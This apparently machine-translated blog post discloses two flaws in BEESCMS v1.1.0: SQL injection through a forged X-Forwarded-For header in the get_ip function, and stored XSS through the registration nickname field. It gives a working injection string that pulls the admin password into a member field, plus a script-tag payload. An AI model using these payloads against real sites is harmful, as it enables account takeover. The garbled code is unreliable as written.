BEESCMS v1.1.0 getip () injection vulnerability and XSS and repair

I recently worked very busy, so I seldom published articles. Recently, BEESCMS v1.1.0 saw another getip injection, which is a problem.

Introduction:
BEES is an enterprise website management system based on the PHP + Mysql architecture. BEES is developed in modular mode. It features powerful, flexible, and easy to expand, and is fully open to source code. It is a multi-language sub-station that provides solutions for enterprise website construction and foreign trade.

Vulnerability 1:

Fun. php
Function get_ip (){
If (! Empty ($ _ SERVER [HTTP_CLIENT_IP])
{
Return $ _ SERVER [HTTP_CLIENT_IP];
}
Elseif (! Empty ($ _ SERVER [HTTP_X_FORWARDED_FOR]) // here it can be forged
{
Return $ _ SERVER [HTTP_X_FORWARDED_FOR];
}
Else
{
Return $ _ SERVER [REMOTE_ADDR];
}
}

Reg. php
$ Ip = get_ip ();
$ SQL = "update". DB_PRE. "member set member_time = {$ addtime}, member_ip = {$ ip} where id = {$ last_id }";

Create x_forwarded_for: 127.0.0.1, member_qq = (select admin_password from bees_admin), and member_phone = ziyi. Then, the administrator password will be sent to your QQ account.

Vulnerability 2: XSS

Similarly, on the registration page, you can import the nickname to the database without filtering, so that you can use XSS. Enter <script> alert (sub-meter) </script> In the nickname field. After successful registration, when the Administrator opens member management in the background, our XSS code is triggered,

Debut: Sub-meter blog

Fix:

There is nothing to say about the injection vulnerability and xss. Just filter out the above problems.